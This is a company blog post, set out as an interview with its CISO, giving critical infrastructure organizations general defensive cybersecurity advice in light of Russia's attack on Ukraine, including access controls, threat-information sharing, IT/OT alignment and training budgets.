Along with the rest of the world, our team has been closely following Russia’s attack on Ukraine. Many organizations are currently working hard to bolster their security against potential cyber threats coming out of Russia. While there are no specific cyber threats to the U.S. at this time, CISA has issued a directive asking critical infrastructure organizations to increase their defenses.
We’ve asked our CISO Bill Lawrence a few questions about the current crisis in Ukraine and what critical infrastructure organizations can do now to protect against cyber threats.
Should critical infrastructure organizations be doing something different in response, or just more of the same (i.e., continue doing assessments, business impact analyses, remediating vulnerabilities, etc.)?
It is very hard to gauge what might happen in the current scenario, especially once veiled threats of nuclear warfare have been made by President Putin. It is a false hope that Russian cyber-attacks that are targeted in Ukraine might not get copied and used by other actors on other targets; once a cyber ‘arrow’ is shot, everyone can get their hands on the code. Also, while official Russian cyber forces are highly engaged in this conflict, they may get re-tasked to sow confusion or destruction in other arenas, or the teeming masses of cyber criminals may be exhorted to do more for Mother Russia and escalate their campaigns against the West. Staying the course with risk assessments, remediations to fix gaps, and urgently protecting the most critical assets of the company should continue to be the way ahead against these threats as well as others.
As in the case of the Solar Winds hack, some attacks take months before they are finally discovered. What are some practical recommendations to prepare/mitigate attacks that are incremental, targeted, and continuous?
First, tightened, role-based access controls with accounts locked down with MFA has become table stakes. Visibility over all privilege elevations can help find when adversaries might be ‘living off the land’ and using existing system tools for their purposes, but still require root/admin permissions. Code signing and monitoring can catch malicious code injections. Intake and share information with ISACs/ISAOs, private sector feeds, and government ones. Advanced organizations can implement behavioral analysis on accounts for anomalous activity as well as ‘hunt’ teams to search systems for signs that someone lurks there.
IT hacks can lead to OT disasters. What advice would you give teams to increase alignment between traditionally siloed teams?
It starts with leadership and a shared purpose. Lacking those, getting to know each other’s capabilities, pain points, and major risks over coffee can help. Both environments want to protect equipment, but downtime or destruction of critical infrastructure can injure or kill. And you’d be hard-pressed to find a true ‘air gap’ between environments; focus on the connective points and work to minimize and better secure those.
What advice would you give to smaller operators with a small cybersecurity crew or one with a fledgling cybersecurity program?
You have to budget for training. If your people don’t have the skill set to run whatever tools they might have (system admin, even) you’re going to have huge gaps. Repeatable, tested processes. Then more advanced toolsets – there are some good SOCaaS solutions out there. Check out Threat Stack.
How should technical leaders communicate with non-technical leaders about what their teams are doing in response to this issue?
“We’re overworked and need more money.” But seriously, leaders should be able to point to recent or future training on the books to amp up team skills in powerful and timely fashion, any tightening and testing of policies and procedures (with a recent third-party pen test), and an example of how a recent attack in the news should be discovered at this company and mitigated rapidly by the team and their tools. Then work in the future budget needs.